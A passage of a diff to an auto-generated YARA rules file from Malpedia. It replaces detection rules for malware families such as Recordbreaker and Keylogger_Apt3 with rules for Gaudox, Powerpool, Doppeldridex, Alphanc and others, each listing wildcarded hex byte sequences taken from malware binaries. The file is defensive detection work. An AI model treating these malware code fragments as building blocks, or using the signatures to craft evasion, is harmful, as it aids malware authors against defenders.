-		$sequence_18 = { c745e4e47d6e00 8945d4 83e302 8945d8 8945e8 8945f8 8b4508 }
-		$sequence_19 = { c1f906 6bd730 8b0c8d80f16e00 c644112800 85f6 740c }
-		$sequence_20 = { 458d4505 488d542440 4983ccff 498bce }
-		$sequence_21 = { 83c40c 8bcb e8???????? 8dbb18030000 57 8d85c8feffff 50 }
-		$sequence_22 = { 4803c8 0fb6442450 6603d2 0fb7da f6d0 89542430 }
-		$sequence_23 = { 6bc930 53 56 8b048580f16e00 33db 8b7508 57 }
-		$sequence_24 = { c783240f000010000000 0f1106 0f1f4000 880438 40 }
-		$sequence_25 = { e8???????? 488d15b6e50100 488bcb 488905???????? e8???????? 488d15b0e50100 }
-		$sequence_26 = { 53 57 ff15???????? 85c0 750a ff15???????? 89442414 }
-		$sequence_27 = { 0f850a010000 498d4c2410 4c8d442458 488d542458 }
-		$sequence_28 = { 7413 668908 83c002 4a 75ee 83e802 66c7000000 }
-		$sequence_29 = { 8d542444 68???????? 52 ff15???????? 85c0 747e 8d442444 }
-		$sequence_30 = { 57 e8???????? 8bf0 83c408 85f6 7518 397310 }
-		$sequence_31 = { 8d8318030000 6a00 50 e8???????? 6800080000 8d831c040000 6a00 }
-		$sequence_32 = { eb1a 8d45fc 50 8b04bd80f16e00 }
-		$sequence_33 = { e8???????? 458d4578 33d2 488bcf }
-		$sequence_34 = { 8a2f 33c0 668945e8 8b45d4 886de5 8b148580f16e00 8a4c1a2d }
-		$sequence_35 = { e8???????? eb05 be9effffff 8b542410 }
-		$sequence_36 = { 51 8b4c2428 e8???????? 6a00 6a00 }
-		$sequence_37 = { 0f849f000000 807d9717 0f8595000000 b801030000 }
-		$sequence_38 = { 4883c702 48894511 48894519 48894521 48894529 }
-		$sequence_39 = { e8???????? 6800040000 8985ccf5ffff 0f57c0 8d85d0f9ffff c645d000 }
-		$sequence_40 = { 8bc8 83e03f c1f906 6bc030 03048d80f17300 50 }
-		$sequence_41 = { 761d 68204e0000 ff15???????? a1???????? }
-		$sequence_42 = { c1f806 6bc930 8b048580f16e00 0fb6440828 83e040 5d }
-		$sequence_43 = { e8???????? 4881c450010000 415d 5b }
+		$sequence_0 = { e8???????? 8bf0 8945fc ff7508 56 e8???????? 56 }
+		$sequence_1 = { e8???????? 85c0 7431 c745ec01000000 837d0c01 7509 }
+		$sequence_2 = { e8???????? 83f8ff 7526 8b4508 8bc8 }
+		$sequence_3 = { e9???????? 8dbdd4fdffff 57 68???????? }
+		$sequence_4 = { e8???????? 56 e8???????? c64446fa00 57 }
+		$sequence_5 = { 33c0 0fa4d006 d7 aa c1c206 e2f3 4e }
+		$sequence_6 = { 6aff ff75cc 6a00 6a03 e8???????? c605????????2e 8b7ddc }
+		$sequence_7 = { 6830750000 e8???????? 833d????????00 0f8582000000 6888130000 }
+		$sequence_8 = { 8bec 81c4e4feffff 60 8b4508 8bc8 0520800000 }
+		$sequence_9 = { 6a00 6a02 e8???????? 0bc0 0f8530010000 c745f000400000 }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 44864
 }
-rule MALPEDIA_Win_Recordbreaker_Auto : FILE
+rule MALPEDIA_Win_Gaudox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9dc0ca6e-db62-51b1-9019-1c46d30aeec8"
+		id = "15dc0059-f613-5f22-9f93-85ef1cdd6f7e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.recordbreaker_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gaudox_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "a0221e50197a38d94db3feaa17095d8a8348850bd5ac357aa5c929b1c8bf609a"
+		logic_hash = "cb1127199cac9fdec74f4f176c228a4ea35dac692422428d5b8a3d96735f1430"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94687,32 +94838,32 @@ rule MALPEDIA_Win_Recordbreaker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 e8???????? 8bd3 8bc8 e8???????? 8b15???????? 8bc8 }
-		$sequence_1 = { 85d2 7425 8b450c b9feffff7f 2bc6 57 }
-		$sequence_2 = { 6a00 8d4514 50 6aff ff35???????? }
-		$sequence_3 = { 8365f800 a1???????? c745f464000000 53 56 }
-		$sequence_4 = { ff35???????? 57 ff15???????? 8b7508 83c410 8bd7 }
-		$sequence_5 = { 33c0 50 6800000008 6a02 50 50 }
-		$sequence_6 = { 83c414 85c0 790f 53 ff15???????? }
-		$sequence_7 = { 57 8906 ff15???????? 53 ff15???????? 33c0 }
-		$sequence_8 = { c1e704 037d14 40 8901 }
-		$sequence_9 = { ff7510 ff750c 56 e8???????? 83c414 56 ff15???????? }
+		$sequence_0 = { 89450c 8b4dfc 8d4508 50 8b450c 8b11 8d04b0 }
+		$sequence_1 = { 8b4dfc 890e 5e 8be5 5d c3 8b01 }
+		$sequence_2 = { b9???????? 57 ffb0b4010000 8d45e0 50 e8???????? }
+		$sequence_3 = { 50 6a00 6a00 6a02 56 6a0a 6a00 }
+		$sequence_4 = { 81f9361d0c5b 741b 81f9640eb076 7413 81f9738429e3 740b }
+		$sequence_5 = { 5d c20c00 b87b0000c0 5f 5e 5b 8be5 }
+		$sequence_6 = { 85c0 7411 3bc6 8d8ddcfeffff 0f47c6 50 }
+		$sequence_7 = { 6689442432 8d442460 89442434 a1???????? 8944244c 8d442430 }
+		$sequence_8 = { e8???????? ff75f0 6a02 6a03 e8???????? 33c0 5e }
+		$sequence_9 = { 83fa6c 751f 83f902 7212 6639544702 750b 810e00040000 }
 
 	condition:
-		7 of them and filesize < 232312
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Final1Stspy_Auto : FILE
+rule MALPEDIA_Win_5T_Downloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "06e7f902-9031-5e75-88f0-dd09807b7f4e"
+		id = "5362fc02-7c1d-5a3b-a300-446438d04597"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.final1stspy_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.5t_downloader_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "2aee3f29893f78ed34587724b374d747687bfd3ae50997bd5da3ecf9af5640fd"
+		logic_hash = "89d6b68b4695f52c4102e727ccfceba9dea8c1d372d4dac3b5353663c79c51c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94726,32 +94877,32 @@ rule MALPEDIA_Win_Final1Stspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a7201 8ad3 3ad6 7412 8a5101 41 84d2 }
-		$sequence_1 = { 46 8a1d???????? 83ff02 7d0e 8bc2 }
-		$sequence_2 = { 5d c3 2d???????? 78dc }
-		$sequence_3 = { 881439 41 3bce 7cef 8bc7 }
-		$sequence_4 = { 84db 75f4 5f 5e 83c8ff 5b 8be5 }
-		$sequence_5 = { 8bc8 83c404 894df8 8bf1 8b4dfc 803900 7426 }
-		$sequence_6 = { bf01000000 eb2b b8???????? 8acb }
-		$sequence_7 = { 3bf7 7cf6 8b3d???????? 66660f1f840000000000 }
-		$sequence_8 = { 6690 3acd 7412 8a4801 40 84c9 }
-		$sequence_9 = { 7d11 8a1439 80c27a 80f219 881439 41 }
+		$sequence_0 = { 8bec 8b4508 85c0 7416 83781400 7510 }
+		$sequence_1 = { 85c9 7409 83781800 7403 5d ffe1 }
+		$sequence_2 = { 8b4508 85c0 7416 83781400 7510 }
+		$sequence_3 = { 8b4508 85c0 7416 83781400 }
+		$sequence_4 = { 7403 5d ffe1 83c8ff }
+		$sequence_5 = { 83781800 7403 5d ffe1 83c8ff }
+		$sequence_6 = { 85c0 7416 83781400 7510 }
+		$sequence_7 = { 85c9 7409 83781800 7403 5d }
+		$sequence_8 = { 83781800 7403 5d ffe1 }
+		$sequence_9 = { 7409 83781800 7403 5d }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 539648
 }
-rule MALPEDIA_Win_Hopscotch_Auto : FILE
+rule MALPEDIA_Win_Powerpool_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4ccf5f3f-fc4d-50c4-9d15-78cb98c3a462"
+		id = "4c6bacc6-3c31-5308-8644-c77bb5f04b3b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hopscotch_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powerpool_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "87c8060052c7a27df707d3c608dced07179361cdfbcc1ac24fe99b2c3ce14a55"
+		logic_hash = "fc225d3ab668ac0553c91764abb5591ff765822f57f79bb166f528bf2dc805b8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94765,32 +94916,38 @@ rule MALPEDIA_Win_Hopscotch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd7 8b742410 8d4c2408 51 6a00 6a00 68???????? }
-		$sequence_1 = { e8???????? 83c404 85c0 7512 53 55 e8???????? }
-		$sequence_2 = { 752c ff15???????? 3d26040000 741f 68???????? e8???????? }
-		$sequence_3 = { f7c600ffffff 7538 8a00 23c7 }
-		$sequence_4 = { 85f6 7511 ff15???????? 50 68???????? e9???????? 8b84241c010000 }
-		$sequence_5 = { 8d44240c 68???????? 50 ffd6 83c408 85c0 }
-		$sequence_6 = { 5b 81c4a0030000 c3 6a00 8d4c2428 6a00 }
-		$sequence_7 = { c3 8b0d???????? 8d542404 52 8b542410 }
-		$sequence_8 = { 57 6af6 ff15???????? 8b35???????? 8bf8 8d442408 }
-		$sequence_9 = { 6a3f eb0b a1???????? 83c020 50 }
+		$sequence_0 = { 743f 85db 743b 8b4304 48 83f814 7732 }
+		$sequence_1 = { 0101 8b45ec 8b4d18 5f }
+		$sequence_2 = { 740f 68b80b0000 ffd7 381d???????? 75f1 8b0d???????? }
+		$sequence_3 = { 006711 40 0000 0303 }
+		$sequence_4 = { 740f 6a02 68???????? 8d4e14 e8???????? 8b4604 }
+		$sequence_5 = { 740f 8b4d0c 51 8b4d08 }
+		$sequence_6 = { 8975ec 8955fc a840 7415 8b4508 8b4df8 8b5df4 }
+		$sequence_7 = { 013e 017e08 894630 5b }
+		$sequence_8 = { 8b6c240c 8b4d00 56 8bf0 8bc1 }
+		$sequence_9 = { 740f 8bc3 83fe10 7303 }
+		$sequence_10 = { 7410 50 6a00 ff15???????? 50 ff15???????? 8b5510 }
+		$sequence_11 = { 014140 8b45cc 8bc8 d3ea 8b4df8 }
+		$sequence_12 = { 740f 837dd001 7509 50 }
+		$sequence_13 = { 740f 8bcb e8???????? c645ff01 }
+		$sequence_14 = { 01411c 8b7df0 85c0 742c }
+		$sequence_15 = { 005311 40 005d11 40 006711 }
 
 	condition:
-		7 of them and filesize < 1143808
+		7 of them and filesize < 819200
 }
-rule MALPEDIA_Win_Cheesetray_Auto : FILE
+rule MALPEDIA_Win_Greenshaitan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0e764866-65b7-5e4b-a972-c9b6a1308865"
+		id = "8f14a34e-de7f-5ea7-9fdc-322bcde7a341"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cheesetray_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.greenshaitan_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "c2cc89a9aac3f1f1be62615be1486f58a410f3fcbd107e350beb164393db52f7"
+		logic_hash = "3cbeaa8f8745b6f3b0557ef1727b77581513ec936eac8ffdebb5493281224370"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94804,34 +94961,34 @@ rule MALPEDIA_Win_Cheesetray_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83b8a400000000 894d10 7666 8b88a0000000 8b0419 03cb 85c0 }
-		$sequence_1 = { 56 57 8d0c00 51 6a00 52 c745f800000000 }
-		$sequence_2 = { 0f8489000000 83f8fc 0f8480000000 8b4618 894508 8d5001 8a08 }
-		$sequence_3 = { c785c8f2ffff18104400 bb05000000 895704 eb22 83f8ff }
-		$sequence_4 = { bb01000000 019ea0160000 0fb690b02b4400 66019c9698040000 8d849698040000 81c1ffff0000 b800010000 }
-		$sequence_5 = { 83c410 85c0 0f84a2000000 56 57 6a0a }
-		$sequence_6 = { 1bcf 894508 0bc1 894d0c 75a2 5f }
-		$sequence_7 = { 8b7d08 8bc7 c1f805 8bf7 83e61f c1e606 03348580ce4400 }
-		$sequence_8 = { 33c9 03f0 13ca 8935???????? 890d???????? eb17 8bc8 }
-		$sequence_9 = { a1???????? 8b0f 83c40c 50 6a3b 51 }
+		$sequence_0 = { eb02 33f6 8bc5 99 }
+		$sequence_1 = { 52 ff15???????? 6804010000 8d442408 50 8d8c2414020000 51 }
+		$sequence_2 = { 899fb8010000 899fbc010000 899fc0010000 899fc4010000 c644241c09 a1???????? 8b4c2428 }
+		$sequence_3 = { 89742414 85ff 7521 e8???????? 33c0 }
+		$sequence_4 = { c1e004 c1ee04 0bf0 0fb686685b6e00 41 8801 83e20f }
+		$sequence_5 = { 3974246c 720d 8b4c2458 51 e8???????? 83c404 8b542430 }
+		$sequence_6 = { 6a00 50 c744245c01000000 e8???????? 837c244410 }
+		$sequence_7 = { ff34c584916e00 53 57 e8???????? 83c40c 85c0 740d }
+		$sequence_8 = { 50 8b442420 50 51 52 57 e8???????? }
+		$sequence_9 = { 0f84d1000000 57 8bcb 8d542418 e8???????? }
 
 	condition:
-		7 of them and filesize < 8626176
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Dizzyvoid_Auto : FILE
+rule MALPEDIA_Win_Hawkball_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b900bbf0-efba-5979-b901-058422cfe398"
+		id = "5f75e692-110c-55bd-97fc-1bd1a739617b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dizzyvoid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dizzyvoid_auto.yar#L1-L226"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hawkball_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "8385659a773378b82a70cc8941b67dcf8ffad28a19525f1f78e990eee9f0fdc1"
+		logic_hash = "ff667bedec18f0ed00ed5af46ab0b00bb4fbcb93b0094e0e12e6710929fc2634"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94843,46 +95000,32 @@ rule MALPEDIA_Win_Dizzyvoid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4590 4533c0 4889442440 33d2 }
-		$sequence_1 = { 4903d1 48c1fa07 488bc2 48c1e83f }
-		$sequence_2 = { 48895c2420 4883ceff 448bce 33d2 }
-		$sequence_3 = { 498bc8 48c1e902 418bc1 48c1e802 }
-		$sequence_4 = { 4889442428 c7442420c0040000 4c8d8de0000000 41b808000000 }
-		$sequence_5 = { 488bcb c744242004000000 41b806100000 488be8 ff5758 }
-		$sequence_6 = { 44897c2428 48896c2420 448bce 4d8bc6 }
-		$sequence_7 = { 448bc6 33d2 b92b040000 ff9358010000 }
-		$sequence_8 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????2a134100 }
-		$sequence_9 = { 8d85a8fcffff 50 8b8d90fcffff 51 e8???????? 83c40c }
-		$sequence_10 = { 83c40c 8bf4 ff9590fcffff 3bf4 }
-		$sequence_11 = { 8b4dfc 33cd e8???????? 81c434040000 3bec e8???????? 8be5 }
-		$sequence_12 = { ff9590fcffff 3bf4 e8???????? 33c0 52 8bcd 50 }
-		$sequence_13 = { 56 57 8dbdccfbffff b90d010000 }
-		$sequence_14 = { a1???????? 33c5 8945fc b9d3000000 be???????? 8dbda8fcffff }
-		$sequence_15 = { b90d010000 b8cccccccc f3ab a1???????? 33c5 }
-		$sequence_16 = { eb36 8b852ce5ffff 8b8d1ce5ffff 8b0485601c4100 }
-		$sequence_17 = { 6a00 50 6a00 6a00 ff15???????? 6aff 50 }
-		$sequence_18 = { c780acff400002000000 6a04 58 6bc000 8b0d???????? }
-		$sequence_19 = { 57 a1???????? 33c4 50 8d842478010000 64a300000000 6800100000 }
-		$sequence_20 = { 8365fc00 833cfd40f2400000 7515 68a00f0000 56 }
-		$sequence_21 = { e9???????? 8365c800 c745cc8d314000 a1???????? }
-		$sequence_22 = { 8d85f0ebffff 03c1 8b8d1ce5ffff 50 8b852ce5ffff 8b0485601c4100 }
-		$sequence_23 = { 47 88440e34 8b049d601c4100 c744063801000000 }
+		$sequence_0 = { 8d5f08 c745f000000000 8d470c c745ec0c000000 53 }
+		$sequence_1 = { 51 53 8b1d???????? 8bd3 8bcb c1ea08 c1e910 }
+		$sequence_2 = { e8???????? 83c40c 8d85fcfeffff 6a01 }
+		$sequence_3 = { 81ec7c050000 53 56 8b7508 57 8b3e 85ff }
+		$sequence_4 = { 53 660f6f05???????? 56 f30f7f4588 }
+		$sequence_5 = { 6a01 894705 ff15???????? 50 }
+		$sequence_6 = { 50 e8???????? 83c40c 8d842478020000 6a00 6a00 }
+		$sequence_7 = { 83c40c 8d842478020000 6a00 6a00 6804010000 50 8d442464 }
+		$sequence_8 = { 8b5dfc eb35 837e4400 7462 6a00 }
+		$sequence_9 = { 6a08 ffd3 50 ff15???????? 8bf0 8d8578ffffff 50 }
 
 	condition:
-		7 of them and filesize < 479232
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Devopt_Auto : FILE
+rule MALPEDIA_Win_Excalibur_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb55bee8-7a67-5968-98f9-09a9025ff6ad"
+		id = "2243999a-f912-5283-8db6-7a7e597c07e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.devopt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.excalibur_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "9b91ff04212580b4783bd5bcbd1899160fd4dd5cabce6d4170850a448d54a587"
+		logic_hash = "58bc3d918cc2c57a1f8a313886d8855731ce5abe92983e974335457efdd3438d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94896,32 +95039,32 @@ rule MALPEDIA_Win_Devopt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4df4 ff91fc000000 8945ec 8b55fc 8b45f4 8b4df4 ff9100010000 }
-		$sequence_1 = { ff969c000000 e9???????? 8b45fc 8b806c030000 8b80a4000000 8b55fc 8b929c000000 }
-		$sequence_2 = { eb36 c745ecffffffff 8db42600000000 8b45ec 8d4001 8945ec 8b45fc }
-		$sequence_3 = { ff75e4 e8???????? a9ffffffff 7402 eb0e ba???????? 89e8 }
-		$sequence_4 = { eb1b 81fa6079feff 7e07 3df0d8ffff 7f08 66c74590f0d8 eb04 }
-		$sequence_5 = { e8???????? 84c0 7502 eb1e 8b45f8 8b40f8 8b55f0 }
-		$sequence_6 = { f77908 89c1 8b45ec ba01000000 8b7dec 8b5f04 ff5308 }
-		$sequence_7 = { ba00000000 e8???????? b101 ba01000000 b8???????? e8???????? 8b55f4 }
-		$sequence_8 = { 8d4de0 8d55d8 8b45f4 8b5df4 8b1b ff9334030000 8b5510 }
-		$sequence_9 = { ff537c 8b45f0 85c0 7403 8b40fc 8945f4 8b45fc }
+		$sequence_0 = { 3902 7518 8b442468 8b4c246c }
+		$sequence_1 = { 894238 8b45d4 89423c 8b45d0 894240 5f }
+		$sequence_2 = { 744b 833f02 750e e8???????? c685bfe5ffff00 eb0c e8???????? }
+		$sequence_3 = { 32db 8bf1 85ff 7543 8b4d08 c70100000000 33d2 }
+		$sequence_4 = { 68e9fd0000 ffd3 83bd8cfbffff10 6a00 6a00 }
+		$sequence_5 = { 8b4d08 81c144060000 ba04000000 894d08 be01000000 03f6 0fb70c0e }
+		$sequence_6 = { 897c05ac eb2b 0f853e010000 85c9 0f8720010000 8b45e0 7208 }
+		$sequence_7 = { 8b75d8 8a5de7 f6c310 0f84b3000000 8d559c 8bce e8???????? }
+		$sequence_8 = { 83c404 33c0 83bd1cffffff08 c7854cffffff07000000 c78548ffffff00000000 66898538ffffff 720e }
+		$sequence_9 = { 8d8d2cffffff c645fc08 e8???????? 57 8bd0 8d8d14ffffff }
 
 	condition:
-		7 of them and filesize < 4645888
+		7 of them and filesize < 1253376
 }
-rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE
+rule MALPEDIA_Win_Doppeldridex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "871f2218-1f0d-5644-a123-b9ca7ac01c6c"
+		id = "7bc1de9c-56ca-5544-aabb-578c6d2a6765"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keylogger_apt3_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doppeldridex_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "23fd7cba40859fc906b768d58d83d5a417832be7f192d8e12b9ebc03b321149b"
+		logic_hash = "f94875582e8b5aa2ebc993fa0b95159a94408b6d25288caadf3c8433582dd0a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94935,32 +95078,38 @@ rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 8bd8 e8???????? 83c408 68???????? 68???????? }
-		$sequence_1 = { ffd7 85c0 75ef 56 ffd7 8bf0 }
-		$sequence_2 = { 85f6 75ba 8b4c243c 5e }
-		$sequence_3 = { 8d4c242c 68???????? 51 ffd7 a1???????? }
-		$sequence_4 = { 8b5004 f7da 1ad2 22d1 }
-		$sequence_5 = { 803b00 758d 8b44241c 40 81c614010000 3b442418 }
-		$sequence_6 = { e8???????? 6a00 6a41 68???????? 8d4ddc }
-		$sequence_7 = { 74c9 8b04cd74104300 5f 5e }
-		$sequence_8 = { 7daa 3b5c2420 7419 8b4c2424 51 }
-		$sequence_9 = { 56 8b74240c 57 85f6 742f }
+		$sequence_0 = { 01501c 015020 015024 01500c }
+		$sequence_1 = { 01500c 833920 751c 8bc1 }
+		$sequence_2 = { 011483 40 3b06 7cf8 }
+		$sequence_3 = { 010c28 8b4e04 42 8d41f8 d1e8 }
+		$sequence_4 = { 017c240c 3b5c2408 0f822affffff ff74240c }
+		$sequence_5 = { 33d2 3b7c2414 0f4cd3 032c24 03ee 2bea }
+		$sequence_6 = { 030c24 0fbe01 88442458 85c0 }
+		$sequence_7 = { 0306 894218 47 3b7c2408 }
+		$sequence_8 = { 897dc4 8955c8 893424 c744240400000000 c744240864000000 898548ffffff }
+		$sequence_9 = { 8945d4 0f84b3feffff e9???????? 8b45e0 }
+		$sequence_10 = { eb0c 8b45dc 6683785c03 7414 eb6e 8b45ec }
+		$sequence_11 = { 83fa00 89459c 8955e0 7475 e9???????? b801000000 8b4d98 }
+		$sequence_12 = { 8b5df0 81f330d7a128 8b4de8 8b541104 39da }
+		$sequence_13 = { 8955f8 ebe7 55 89e5 50 }
+		$sequence_14 = { 8945ec 894de8 897de4 742c eb0c }
+		$sequence_15 = { 83fa20 0f92c4 8a6db3 20cd 20e5 f6c501 8955b4 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Cueisfry_Auto : FILE
+rule MALPEDIA_Win_Alphanc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3f94f63a-bd01-5ab8-af5f-ba8550248461"
+		id = "ebf0ef1c-787d-588a-9f36-5c61e5121c6c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cueisfry_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alphanc_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "fe662cbb30073bd6bd4ed92effaa065add48a5ad78c3a6b1fdab8c2e82a82aba"
+		logic_hash = "c1872178a4528cd6c6c1bbe8c32caefd5306a7f5c047a004c099269a20f7813d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94974,32 +95123,32 @@ rule MALPEDIA_Win_Cueisfry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b44241c c1e308 0bdf 8b542438 }
-		$sequence_1 = { 897dfc 57 897dd8 c645fc01 ff15???????? 8d4dec }
-		$sequence_2 = { 6803400080 e8???????? 8b45ec 8b08 50 ff5108 897dec }
-		$sequence_3 = { 0f95c0 84c0 7508 83c8ff e9???????? 8b2d???????? 33f6 }
-		$sequence_4 = { f3a5 50 e8???????? 8d4c2424 51 e8???????? }
-		$sequence_5 = { ff15???????? 8bcf 8be8 8bd1 33c0 8bfd }
-		$sequence_6 = { b910000000 8d7c241c f3a5 8d4c241c 68???????? }
-		$sequence_7 = { 50 8d442434 6a01 50 ffd7 56 }
-		$sequence_8 = { 85c0 0f95c0 be???????? 8dbc24b0010000 84c0 f3a5 }
-		$sequence_9 = { 83c40c 53 ff15???????? 68???????? e8???????? 83c404 }
+		$sequence_0 = { 8bda 81e3ff000000 8b1c9d18c54c00 81e3ff000000 33fb 8b5e04 33fb }
+		$sequence_1 = { 8d54245c 6a1a 52 e8???????? 8d7c2464 83c9ff 33c0 }
+		$sequence_2 = { 8b542420 8bd8 8d4601 50 52 53 e8???????? }
+		$sequence_3 = { a1???????? 83c410 85c0 0f85d7000000 68ca010000 68???????? 6a10 }
+		$sequence_4 = { e8???????? 3bc7 89442420 750d c744241041000000 e9???????? 8b442438 }
+		$sequence_5 = { 741d 03d6 52 51 50 e8???????? 8b54242c }
+		$sequence_6 = { 8d9424ec000000 85d2 7421 8d8424ec000000 53 50 e8???????? }
+		$sequence_7 = { 8bc5 5f 5e 5d 5b c3 6893000000 }
+		$sequence_8 = { c3 8b5558 8d4c2458 51 c644241741 899a74030000 8b4558 }
+		$sequence_9 = { c1e205 6a08 8d8a20074e00 51 53 53 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 2015232
 }
-rule MALPEDIA_Win_Poohmilk_Auto : FILE
+rule MALPEDIA_Win_Firechili_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
